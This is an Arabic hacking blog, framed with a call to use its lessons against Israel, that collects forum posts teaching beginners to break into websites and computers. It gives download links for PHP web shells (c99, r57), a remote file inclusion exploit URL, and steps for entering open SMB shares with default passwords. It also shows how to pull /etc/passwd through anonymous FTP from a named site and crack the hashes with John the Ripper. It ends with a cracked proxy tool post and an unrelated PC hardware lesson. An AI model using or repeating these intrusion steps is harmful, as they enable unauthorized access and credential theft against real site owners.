تبرع للمدونة وساهم في تطورها

مرحبا بالجميع أتمنى لكم قضاء وقت ممتع معنا لا تنسو استخدام كل هذا فيما يرضي الله تعلمو من أجل تحطيم اسرائيل من أجل مساندة الشعب الفلسطيني تحياتي فن الإختراق

عن المدونة

����� �������

�����

����� �������

المشاركات الشائعة

الأربعاء، 30 يوليو 2014

كل شي عن الشل أي ما يسمى السكريبت


السلام عليكم ورحمة الله وبركاته
انا اخوكم مالك من سلطنة عمان الملقب با تدمير هكر:/
حبيت اعمل شرح لا اصعب شي واجهني في الهكر.. وهو الشل وكيفية رفعه!
حيث اني توقفت و الى الان ان متوقف بسبب هذه المشكله..وهي انا نزلت الشلc99 على جهازي بعد ذالك ماذا افعل؟
اتمنى الرد على السؤال وشكرا
.(.(.(.(..).).).).).).).
الان ناتي للمووضوع....’’’
بسم الله نبدأ
س1 ما هو الشل؟
الشل هو سكربت بصيغة php يقوم بتطبيق اوامر علي السيرفر الي احنا رافعينو عليه من خلال ثغرة ما و يعرض لنا محتويات الموقع من ملفات و مجلدات و ممكن حتى ملفات و مجلدات
جميع المواقع على السيرفر و كما سبق الدكر ان الشيل يسمح لنا بتطبيق اوامر على السيرفر فهدا يلخص كل شيء فنعني بالاوامر تعديل الملفات قراءتها و غيرها
س2ما هي افضل الشلات؟
اكثر الشلات استخداما هم c99 , r57 , sniper
وانا في رأيي افضلهم هو c99
س3 ما الاختلاف بينهم؟
قد يكون الاختلاف في واجهة الشل او في ميزة يتميز بها شل عن اخر
س4 كيف يتم رفع الشل؟
هذا هو الجزء الاصعب
فلكي ترفع الشل يجب ان يكون هناك ثغرة ما في ملف من ملفات الموقع حتي يتسني لك رفع الشل
فمثلا ملف index في موقع ما به ثغرة اذن يمكننا رفع الشل
س5 كيف اجد الثغرة؟
1- ادخل الي موقع http://milw0rm.com
2-اصغط علي كلمة search
3-اكتب اسم السكربت
4- هيجيلك كل الثغرات الموجودة اختار منهم واحدة
س6 وكيف استطيع استغلال الثغرة؟
انت بعد ما تلاقي مثلا في الموقع المستهدف سكربت Article Directory
هذا السكربت به ثغرة في ملف index.php
والكود المسبب للثغرة هو
كود PHP:
<?php include($_GET[egypt]); ?>

علشان نستغل الثغرة دي هنكتب في المتصفح الكلام ده
http://www.xxxx.com/index.php?egypt=VVV.txt
xxxx =رابط الموقع المستهدف
vvvv=رابط الشل الي هترفعو (متنساش تكتب بعديه علامة استفهام)
س7 بعد ما ارفع الشل اعمل ايه؟
دلوقت انت تقدر تتحكم بالموقع بس بشرط لازم يكون في الموقع ملف بتصريح 777 عشان تقدر تعمل الي انت عاوزة ولو مفيش يبقي هارد لك
س8 الشل مش راصي يترفع اعمل ايه؟
الموقع ممكن يكون الثغرة دي مترقعة عنده عشان كده مش هتعرف تخش ولازم تعرف ان الثغرة تنفع في موقع وعشرة لا يعني متضايقش اوي لو انت مش عارف تخترق الموقع .
والان بعض الشلات هدية مني
c99
http://no-hack.net/shells/c99.txt
r57
http://no-hack.net/shells/r57.txt
sniper
http://no-hack.net/shells/sniper.txt
mohajer
http://no-hack.net/shells/mohajer.txt
....
ل الامانه (بعضض)الموضوع منقوول
وشكرا

مــوقع لـــتخمين مســآر لوحة تحكــم آلمــوآقع + مــوقع فــك آلــهآشآت آلمفــضل


آلـــسلآم علـــيكم ..

بــسم آلله آلــرحمن آلرحيــم ..

كيــف حآلكم ..؟
آنشآلله بآلف عـآفيه ..

فــيه بعضــنآ ..بعضــ برآمج آلتخمــين مآتركب جهـآزهـ ..
آو شى من هـذآ آلــقبيل ..


حـــبيت آقــدم لكم موقع :::

http://sc0rpion.ir/af/

لآضهــآر لوحة تحكـم آلمــوآقع ..

+

وهــذآ موقع يوجد فــيه 6 مواقع او آكثــر لفـــك آلهــآشآت ..
Mb5
طبــعآ جميعهـآ بــموقع وآحد ..
تفــضلو ..:::

http://kurd-security.com/md5.php

اخترق بـ البورت 21- 23-139-80

اليوم الموضوع قوي,,وهو عباره عن الاختراق عن طريق البورتـات(المنافذ)المفتوحه في جهاز الضحيه
بسم الله نبتدى

اول شيئ باستطاعتـك اختراق جهاز الضحيه اذا كان عنده عده بورتات مهمه مفتوحه في جهازه

مثل البورت 21 بورت الـ ftp وبورت 23 بورت التلنـت وبورت 139 النت بيوس والبورت 80 لاختراق الراوترات.

عن طريق برامج السـكان تقدر تفحص النطاقــات والبورتـات المفتوحه بوضع نطاق الايبي




طيب الان عرفنا كيف نفحص الايبي واستخراج البورتات المفتوحـه

الان نشوف الطريقه الثانيه وهي عن طريق برامج السكـان

انا رح استخدم برنامج angry ip scanner

تابع






تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 648x451.


تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 746x467.




تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 1035x856.

وتستطيع ايضا تستعمل هذه الخيارات اذا وجدت بورتات مفتوحه
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 662x458.


البورت 21 ftp

البورت 23 التلنت

البورت 80 المتصفح

البورت 139 النت بيوس مشاركه الملفات

طيب نجرب ندخل مثلا على البورت 139 البورت الخطير

نفحص ببرنامج السكان عن البورت 139 ونضع نطاق الايبي ونبحث

انا بحثت ووجدت ايبي مصاب بالبورت 139 تابع ماذا نفعل

نذهب الى ابدأ ثم تشغيل ثم نكتب

\111.111.111.111\\

مثال بدل الارقام ضع الايبي المصاب

واضغط انتر


الان اذا لم يكن محمي بباسورد تستطيع الدخول بسهوله اما اذا كان محمي بباسورد

جرب الباسوردات الافتراضيه

admin,passworf,test,guest,user

انا دخلت على جهاز طلع غير محمي بباسورد
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 788x591.




تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 789x594.


تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 791x595.



وكذلك تستطيع الدخول عن طريق الـftp اذا وجدت ايبيهات مصابه باستخدام اوامر الـftp

مثلا وجدت البورت 21 مفتوح عند الضحيه تستطيع الدخول عن طريق برنامج السكان

واذا كنت تحب الاختراق المستهدف كل شخص له طريقته في جلب الايبي ومن ثم الفحص

ببرنامج فاحص المنافذ المفتوحه بأول الموضوع,,

كل هذا فقط شرح بسيط في عالم الاختراق عن طريق البورتات,,

الاختراق عن طريق البورتات طريق مفتووحـه ليس لها نهايـه,,بامكانك اختراق خبراء الهكر بها

شرح اختراق المواقع بالتفصيل

*******شرح اختراق المواقع بالتفصيل****
الدرس الأول من دروس اختراق المواقع :
في البداية يجب أن تعلم بعض المعلومات البسيطة مثل :
هاكر = مخترق = donkey
هاكرز = مخترقون = donkeys = donkeyz
admin = المدير
OS = Operating System = نظام تشغيل
بورت = منفذ = Port
سيرفر = خادم = Server : وهي عبارة عن أجهزة كمبيوترفائقة القدرة ذات قدرة كبيرة على المعالجة وتخزن بها ملفات المعلومات وقواعد بيانات الشبكة والبرامج المختلفة بها.

لاختراق أي موقع تحتاج لمعرفة بعض المعلومات عن الهدف(الموقع) كنظام التشغيل الذي يعمل عليه والخدمات الموجودة بالموقع
لا تتعجل فشرح هذه الأمور قادم لتعرف أي الثغرات ستسخدم أوستستغل لاختراق الموقع وفي هذا الملف سأشرح لك كيفية عمل ذلك أما في الدرس الثاني فسأشرح لك بإذن الله
كيفية الاستفادة من تلك المعلومات.

1- عليك عمل بورت سكان Port Scan لمعرفة البورتات أو المنافذ المفتوحة بالموقع.من لينكس يمكنك إستخدام nmap لكن لن أشرح هذه العملية من اللينكس
من الويندوز يمكنك استخدام برنامج Super Scan.
وتفيدك هذه العملية فيما بعد في نزع التوقيع فمثلا لو وجدت ان موقعا مفتوح به البورت 21 وهو للتلنت
يمكنك الذهاب إلى تلنت وهو برنامج يأتي مع الويندوز

start==>run
إبدأ==>تشغيل
ثم اكتب
telnet
بعد ذلك إضغط على قائمة
connect
ثم
Remote System
ستظهر لك شاشة اكتب اسم الموقع في Host Name واترك المنفذ كما هو telnet
ثم اضغط
connect
سيتصل بالموقع وحينئذ سيظهر نظام التشغيل للموقع.
وأهم البورتات هي
21 للتلنت وهي خدمة تسمح لمستخدميها بالتصال بأي جهاز آخر يستعمل نفس الخدمة
23 للإف تي بي أو بروتوكول نقل الملفات FTP=Files Transefiring Protocol
والبريد الصادر والوارد 110 - 25

21 FTP
22 SSH
23 Telnet
25 SMTP
79 Finger
80 HTTP
110 POP3

وللإتصال ببورت معينمن التلنت اكتب البورت في خانة Port مكان كلمة Telnet
هذا الموقع يمكنك من معرفة العديد من الأشياء عن اي موقع
http://www.psyon.org/tools/index.html
2- الخطوة الثانية هي ما يسميه البعض نزع التوقيع أو فحص البانر.
والبانر هو الرسالة التي تراها حين تحاول الاتصال بجهاز ما (أو موقع فلا فرق ) عبر منفذ (بورت) معين.
فمثلا حين تحاول الاتصال عبر البورت 23 وهو للتلنت مع جهاز يعمل على نظام لينكس ماندريك سيظهر لك الآتي :

Linux Mandrake release 6.1 (Helios)
Kernel 2.2.13-4mdksmp on an i686
login:

ما عرفناه من هذا أن هذا الجهاز يعمل على نظام تشغيل لينكس مانريك 6.1 والنواة هي 2.2.13.
3- شء آخر عليك ملاحظته هو رسائل الأخطاء! ومن أشهرها الرسالة 404 Error وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطيرة لكنها تفيد
في عملية الاختراق

* عليك ان تعرف أن الموقع هو عبارة عن جهاز كمبيوتر لكنه يعمل 24 ساعة ويوجد به ملقم ويب (خادم) Web Server ويعمل على نظام تشغيل وأنت حين تخترق فإنك تخترق هذا
الجهاز الذي توجد عليه كل ملفات الموقع وقد يوجد على الجهاز أكثر من موقع مثل شركات الإستضافة وهذه تكون ضربة الهاكر الكبرى...
يجب عليك معرفة الأشياء التالية عن اي موقع :

- معرفة &نوع وإصدارة ملقم الويب هل هو IIS4 - IIS5 هل هو Apache ....
- معرفة &نظام التشغيل وإصدارته هل هو Windows200 مثلا أو Linux redhat 6.2 مثلا...
وعليك معرفة ذلك لأن لكل نظام تشغيل الثغرات الخاصة به...وأيضا توجد ثغرات لملقم الويب مثل ثغرة اليونيكود لسيرفرات IIS.
- معرفة &كل سكربتات بيرل وسي جي آي الموجودة بالموقع مثل المنتديات وسجل الزوارأو عداد الزوار وهكذا.....
- وأيضا &معرفة كل الخدمات الأخرى بالموقع كالبريد وغيرها...ومثلا معرفة نوع وإصدارة سيرفر الإف تي بي إن وجد بالموقع (حسب البورت سكان كما سبق)
وأيضا مفسر نصوص بيرل إن وجد ... كل هذه الأشياء يمكنك إيجاد ثغرات لها...حسنا كيف تعرف هذه المعلومات عن الموقع

وكيف تحصل على ثغرات لها؟
أولا كيف تعرف هذه الأشياء؟
- معرفة &نظام التشغيل.يمكن معرفة نظام التشغيل من التلنت إن وجد بالموقع كما سبق.
ويمكنك معرفة ملقم الويب ونظام التشغيل من بعض البرامج أو من هذا الموقع

http://news.netcraft.com/
واكتب اسم الموقع في المكان المخصص لذلك ثم اضغط على Lookup أو انتر.
سيظهر لك الملقم و نظام التشغيل وإصدارتيهما مثلا هذه معلومات عن أحد المواقع
عن طريق الموقع السابق
Apache/1.2.6 FrontPage/3.0.4.1 on FreeBSD
يظهر هنا أن ملقم الويب هو
Apache
النسخة/الإصدارة
1.2.6
مع دعم الفرونت بيج
ونظام التشغيل يأتي بعد كلمة on وهو
FreeBSD
يمكنك الآن البحث عن ثغرات لهذه النسخة من الملقم أو نظام التشغيل
والفرونت بيج توجد به الكثير من الثغرات ويهمنا منها
_private
_vti_pvt
_vti_cnf
وأحيانا
_vti_bin

ستتعلم كيفية استغلال هذه الثغرات في الدرس الثاني...
- يمكنك &معرفة سكربتات تبيرل وسي جي آي الموجودة بالموقع عن طريق الذهاب إلى الصفحة الرئيسية للموقع
(ليست صفحة الترحيب كما في بعض المواقع) بل الصفحة التي تستطيع منها التعامل مع الموقع والتي
قد ترى بها محرك بحث أو منتدى أو قائمة تصويت أو قائمة بريدية أو أي مربع يطلب منك كتابة أي معلومة.
(ملحوظة بعض هذه المربعات قد تكون جافا سكريبت)
ثم إضغط بالزر الأيمن للفأرة في أي مكان من الصفحة واختر من القائمة التي ستظهر إظهار المصدر
View Source
وابحث فيها عن أسماء ملفات تنتهي بـ
.pl و .cgi
ويمكنك البحث عن ثغرات لها ..(بعد قليل)
- يمكنك &معرفة سيرفر البريد بعد ذلك ونوع سيرفر الإف تي بي الخاص يالموقع
من خلال عملية نزع التواقيع كما سبق بالاتصال بالموقع من البورتات 25 - 21 - 110

حسنا إنتهت الآن الآن عملية جمع المعلومات عن الموقع....عليك الآن البحث عن ثغرات لها

قنبلة وتحدي أقوى برنامج لفتح المواقع المحجوبه لاتدعه يفوتك onspeed



البرنامج كامل وتثبيت صامت ولا يحتاج لمعلومات التسجيل ولايمكن تغير المعلومات ،،،،
فقط انقر على ملف التثبيت وانتظر حين خروج رسالة اعادة التشغيل ،،،
اعد الشتغيل ستجد البرنامج كامل والكمال لله ،،،

--------------------------------------------------------------
ارجو التقيم ياشباب ماشفت موضوع بخمس نجوم بالمنتدى
بدون كثرة كلام
لتحميل البرنامج

هام! ضع ردا ليكتمل لك رابط التحميل

لأخذ فكرة أكثر عن البرنامج
البرنامج غنى عن التعريف فهو البرنامج الوحيد الذى يسرع النت بحق
وذلك ما اكتشفته بعد طول بحث وتجارب لانه يقوم بالاتصال بسيرفر بريطانى
ويقوم بضغط الصفحات لتسريع فتحها
مزايا البرنامج
قنبلة وتحدي أقوى برنامج لفتح المواقع المحجوبه لاتدعه يفوتك onspeed 23557678rb0.gif

1- يعطيك سرعتك كاملة عن طريق الاتصال بسيرفر بريطانى.
2- يغير لك IP فتسبح فى بحور النت دون ان يراك احد.
3- يحسن لك كل ما يتعلق بالنت من تحميل ورفع ملفات وغيره
4-يفتح لك كل المواقع المحجوبة فمعه ليس هناك موقع محجوب
.

ملاحظات هامه
http://img514.imageshack.us/img514/5063/72817062hy1.gif
- اذا اردتم ان تحصلوا على اعلى درجة تسريع ممكنة من البرنامج اضغط على البرنامج كليك شمال- وستجده بعد التنصيب بجانب الساعة-
اضغط عليه واختارsettings ستجد صورة ومؤشر تحتها كلما اخذت المؤشر ناحية اليسار زادت السرعة وقلت وضوح تلك الصورة, ثم اضغط ok.

انظر هذه هى الصورة

- البرنامج يحجب الصور المتحركة -الانيميشن- مثل التواقيع المتحركة ليزيد السرعة فاذا اردت الا يحجبها فلا تسحب المؤشر الذى تحت الصورة كثيرا تجاه اليسار.

- اذا سحبت المؤشر الى اخر جهة اليسار اخذت سرعة جنونية ولكن سوف تشوه الصور
ويمنع معظم الصور المتحركة من الحركة اذا كان فى الصفحة شىء من هذا -الانيميشن-
والافضل ان تتركه على ماهو عليه حيث انه مضبوط على ان تكون الصورة جيدة+التسريع

كما تعرفون معظمنا يستخدم سيرفر واحد وقد يخلق هذا ضغط على السيرفر لذا يجب أن ننوع في السيرفرات وأنا شخصيا استعملت سيرفر من بين هذه السيرفرات ولاحظت فرق كبير في السرعة عن السيرفر الأصلي
طريقة ادخالها اضغط كليك يمين على ايقونة البرنامج بجانب الساعة ثم stop onspeed
ثم اضغط كليك يمين على ايقونة البرنامج بجانب الساعة مرة ثانية ثم setting ثم connection ثم advance
وهذا هو السيرفر الاصلى الذى بداخل البرنامجdirectional.onspeed.com الذى ستحذفه
وبعدها أدخل أحد هذه السيرفرات واضغط ok ثم ok ثم كليك يمين على أيقونة البرنامج ثم start onspeed
ستجد البرنامج يعمل فى ثوانى
فمن اراد ان يجرب سيرفر يشيل السيرفر الاصلى فقط
ولايغير اى اعدادات اخرى بجانب السيرفر بل يترك كل حاجة زى ماهى
وهذا لايعنى اننا بهذه الطريقة سنستغنى عن اليوزرنيم والباس ورد
لا بل لابد منهما وانما الفكرة هى ان نخف الضغط عن السيرفر الاصلى
فتزداد سرعتنا فوق سرعة
وهذه السيرفرات التى تعمل من مشاركة اخونا مراسل الجزيرة
تفضلو
aluminium.onspeed.com
coyote.onspeed.com
accelerator.onspeed.com
sulphur.onspeed.com
helium.onspeed.com
magnesium.onspeed.com
oxygen.onspeed.com
phosphorus.onspeed.com
scandium.onspeed.com
titanium.onspeed.com
yuma.onspeed.com
fluorine.onspeed.com
navaho.onspeed.com


ملحوظة هامة

الذين يستخدمون اى متصفح اخر غير الاكسبلورر
على اجهزتهم سيظهر لهم بعد الريستارت
هذه الرسالة فيها اسماء المتصفحات وانت تختارالمتصفح الذى تريد
ان يتوافق البرنامج معه ولناخذ مثالا لذلك الفاير فوكس
ستظهر لك مثل الصورة التالية فقم باختيار رقم واحد كما بالصورة

هى تعمل بدون اعدادات فاذا لم تعمل مع البرنامج
قم بضبط الاعدادات كالتالي :-
نضغط على قائمة Tools > ثم نختار منها Options
ثم نضغط على Settings كما بالصورة

ثم نقوم بضبط الاعدادات كما بهذه الصورة
وضع هذا dns التالى
127.0.0.1
وضع فى البورت هذا الرقم 5405

اذا اراد احدكم ان يحذف البرنامج فعليه ان يرجع الاعدادات كما كانت
يعنى يحذف الارقام التى اضفناها ويعلم على اول اختيار
بدلا من الثالث الموجود فى الصورة السابقة ويضغط بعد ذلك ok
لابد ان نعمل هذا والا لن يعمل النت بعد حذف البرنامج.
أرجو ان تكون اضافتي هذه مفيدة لكم وبالتوفيق
و بالنسبة الى الاكسبلورر
اذا كنت تريد اعلى سرعة معها وبدون تجمد وبدون مشاكل اتبع الاتى
لو بتستخدم الاكسبلورر يبقى لازم تستخدم IE وهى اداة تعطيك مزايا كثيرة
وتمنع مثل هذا التجمد وتقلل كمية كبيرة من الانهيارات
واذا لم تكن تستعملها فهذا هو الرابط لتحميلها
http://www.ie7pro.com/
بعد تحميلها و تسطيبها اضغط عليها وستجدها تحت فىstatus bar
اضغط عليها كليك يمين وادخل على اعدادت الوكيل ستجد
فى اعدادت الوكيل امكانية وضع وكيل
اضف اليه هذا الرقم
127.0.0.1:5405
واجعله هو الوكيل المستعمل
طبعا وحضرتك بتسطب الاداة اختار اللغة العربية فهى موجودة
وبعدان اعمل ريستارت للجهاز
وان شاء الله سيعمل 100% مع الonspeed
اما اذا كنت تريد حذف البرنامج وارجاع الويندوز بالاتصال بالنت فاعمل الاتى
اولا:هام جدا/ اغلق البرنامج بالضغط على ايقونته واختاركلمة Exit
احذف البرنامج من الكمبيوترمن controlpanel
اعمل ريستارت للجهاز وقبل ان تفتح متصفح النت اعمل الاتى
اذهب للبارتشن c وادخل على ملفات البرامج وابحث عنه
فان وجدت اثر له اعمل له دليت والا فلا.
ثم
1- اضغط على ايقونة الاكسبلورر كليك يمين واضغط على properties
2-ستظهر لك صفحة اضغط على connections
3-بعدان فى الصفحة التى ستظهر اضغط على Lan settings
4- اضغط على advanced
5-ستجد اعدادات البرنامج بالداخل ارقام يعنى احذفها
واضغط ok
6-ستعود الى الصفحة التى فيها كلمة advanced
وتشيل العلامات التى على البروكسى وغيرها
وتعلم على الاستخدام الاتوماتيك ثمok
ثم الصفحة المتبقية ايضااضغط ok
بهذا نكون رجعنا الاعدادت كما كانت
اضفت هذه الاضافات للذين يريدون حذف البرنامج من اجهزتهم
ولابد من عملها حتى يعود الاتصال بالنت بدون البرنامج
وهذا لان البرنامج يقوم بعمل اعدادات له وعند حذفه
لابد ان نرجع اعدادات النت بالطريقة التى شرحتها بالترتيب
لاتنسونا من ردودكم الطيبة

كيفية اختراق المواقع للمبتدئين




كيفية اختراق المواقع للمبتدئين

بسم الله الرحمن الرحيم
وقل ربى زدنى علما

صدق الله العظيم !!
اولا يا شباب يعنى ايه ثغره وكيف تتطبقها وطيف تعرف ان الموقع يدعم بثغره

اسئله تدور فى ذهننا فلكى تعرف فتابع هاد الشرح مع التطيبق

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!

" الثغرات "

* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع

User name-Password
وهما يكونان محفوظين في ملف يسمي

PASSWDغالبا

بعض المواقع تضع هذا الملف في الإف تي بي

ما هو إف تي بي؟

FTP=File Transfer Protocol بروتوكول نقل الملفات

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت

start==>run إبدأ ثم تشغيل

واكتب telnet

سيفتح التلنت اضغط علىRemote System ==> connect

ثم اكتب الموقع في Host Name مثلا

kahane.org أو الآيبي الخاص به

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي

ثم اضغط connect

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code

user anonymous

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب

pass zzzoozz@yahoo.com

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..

بعدها سنحصل على ملف الباسوورد

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل

cute ftp - ws_ftp

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان

ftp.kahane.org

لتحصل على الملف في التلنت اكتب

retr /etc/passwd

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع

Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

الاختراق من الإف تي بي أصبحت طريقة قديمة لذا لن تجد موقعا حديثايضع ملف الباسوورد في إف تي بي ذكرنها فقط كمقدمة..إذا أردت تجريبها جربها على هذا الموقع

ftp.pangeia.com.br

ولزيادة معلوماتك عن الاختراق بالف تي بي قم بتحميل الملف الموجود بنهاية الصفحة

وبعدها؟؟المشوار مازال طويلا...كلمة السر ستكون مشفرة وسنشرح كيقية كسرها في النهاية....


--------------------------------------------------------------------------------

Exploit = اسثمار = ثغرة

الجزء المهم:

الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغلالها للحصول على ملف الباسوورد وقاعدة البيانات وووو..إلخ

أولا يجب أن تجمع كل المعلومات الممكنة حول الموقع :

1- المنافذ المفتوحة مثل الإف تي بي والتلنت مثلا وهذ عن طريق برامج مثل

super scan

ابحث عنه في الانترنت.

2- معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لآخر.

لمعرفة نظام التشغيل إذهب إلى الموقع

www.netcraft.net
واكتب الموقع ثم إنتر..!!.! وستعرف بعض المعلومات عن الموقع كلآيبي ونظام التشغيل...إلخ

3- معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك

4- معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي

أنواع الثغرات

أبسط الأنواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل

www.thesite.com/....../
والأنواع الباقية أو الاستثمارات :

ثغرات مكتوبة بلغة بيرل *.pl

ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج

Active Perl

ثغرات بلغة سي

*.c يمكن استخدامها في لينوكس فقط

ثغرات بلغة شل

*.shويمكن استثمارها في لينوكس فقط

ويمكنك إيجاد الكثير من الأنواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها

www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
www.ussrback.com
www.packetstorm.securify.com
www.secureroot.com
www.rootshell.com
أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج.

ويمكنك من خلال البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن ثغرات لها في مواقع الثغرات أو المواقع السابقة.وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك بحث أو حتى عداد زوار

حسنا لنفرض أنك حصلت على ملف الباسوورد..المشكلة أن كلمةالسر تكون بداخله مضللة shadowed أو مشفرة encryption.

مثال لملف باسوورد

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp

ولأن ملف الباسوورد يحتوي على كلمات سر الأشخاص المرخص لهم بدخول الموقع قد لا بزيد عن عشرة أسطر وقد يصل آلاف الأسطر...

كلمات السر السابقة مضللة وهي علامة xوقد تختلف..

أما المشفرة والتي سنحصل عليها تكون هكذا:

مضللة root:x:0:1:Super-User:/:/sbin/sh

مشفرة root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh

root = أو الجذر اسم المستخدم

x = كلمةالسر ولكنها مضللة

وباقي السطر غير مهم

في الأغلب ستكون كلمة السر مضللة shadowed لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر مشفرة يسمى ملف الشادو

shadow file

ويوجد في أماكن معينة تختلف باختلاف نظام التشغيل

token = الرمز الذي يعبر عن الباسوورد


Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *

مثال لملف شادو

root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935:::::: lp:NP:6445::::::

نجد أن كلمة السر هي

EpGw4GekZ1B9U

كيف تفك التشفير؟

عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات

John the ripper
وهو يقوم بتجريب كل المحاولات الممكنة حتى يحصل على الباسوورد .

ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثلا وعليك وضع الكلمة المشفرة بدلا من الx وعليك ترتيبها بحيث يكون كل حساب في سطر

طريقة تشغيله:

إذهب إلى الدوس واكتب

john passwd

حيث passwd هو الملف الذي به الباسوورد المشفرة وضعتها

سيظهر :

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE

وإذا أردت معرفة الباسوورد التي يخمنها الآن اضغط انتر

والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه

john.pot

وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه

وفى النهايه ارجو الاستفاده من هاد الموضوع

دورة في الصيانة المكثفة

مبادئ الصيانة :
ما هي القطع الأساسية التي نحتاجها لتجميع حاسب آلي ؟
1 الشاشة screen
2 اللوحة الأم مذر بورد mother board
3 المعالج processor/CPU /
4 الذواكر RAM
5 وسيط تخزين قرص صلب HARD DISK
6 مشغل القرص المرن FLOPY DISK DRIVE
7 مشغل أقراص ليزرية CD-ROOM
8 لوحة المفاتيح + الفأرة
9 الصندوق CASE – BOX
10 كرت شاشة VGA CARD
11 كرت صوت SOUND CARD
12 كرت فاكس ( مودم )
 ملاحظات :
لا يمكن تشغيل الجهاز بدون المعالج CPU
تقاس سرعة تنفيذ العمليات بوحدة تسمى الميغا هيرتز MHz
 المعالج:
يتم معرفة نوع المعالج واسم الشركة المصنعة له من خلال الكتابة الموجودة
على سطح المعالج ويتم تحديد سرعته من أرقام موجودة على السطح أيضاً .
 أنواع المعالجات :
هناك علامة بلون أبيض في إحدى زوايا المعالج لتحديد الرجل التي نستطيع من
خلالها تركيب المعالج في المكان المخصص له في مكان يسمى القابس
 أجيال المعالج :
1 PENTIUM 1
وتتراوح السرعة فيه من 100 إلى 233 MHz
2 2 PENTIUM
وتتراوح السرعة فيه من 233 إلى 450 MHz
3 PEMTIUM 3
وتتراوح السرعة فيه من 450 إلى 1300 MHz
4 PENTIUM 4
وتتراوح السرعة فيه من 1300 إلى 4000 MHz وهي في تزايد مع المرور الزمن
حجم الذاكرة المختبئة نوعان :
1 حجم 128 K وتكون من النوع سيلريون
2 حجم 256 K وتكون من النوع انتل

 أهم الشركات المنتجة للمعالج :
IBM / AMD /INTEL /CYRIX وأشهرها INTEL .


اللوحة الأم MOTHER BOARD
 تتكون اللوحة الأم من :
1 مجموعة من الخطوط الداخلية منها :
أ ممرات المعطيات data base الخاص بالمعلومات فقط .
ب ممر العنونة address bus .
2 فتحات توسعة خاصة بوضع الكروت expansion slots مثل : ( كرت الصوت ، كرت الشاشة ، كرت الفاكس مودم ، …. ) .
3مكان يوضع فيه المعالج يسمى القابس slot ، sdecket الخاص بمعالجات البنتيوم 2 فأعلى .
4مجموعة من الفتحات تسمى banks خاصة بوضع الذواكر فيها .
5 منافذ خاصة بتركيب كبلات المعطيات للأقراص .
6 منافذ الدخل والخرج ( O PORTS /I )
ومنها المنافذ التسلسلية COM1 / COM 2
ومنها المنافذ التفرعية LPT
 ملاحظات هامة :
1 تعتمد السرعة على المعالج في الجهاز من أي نوع .
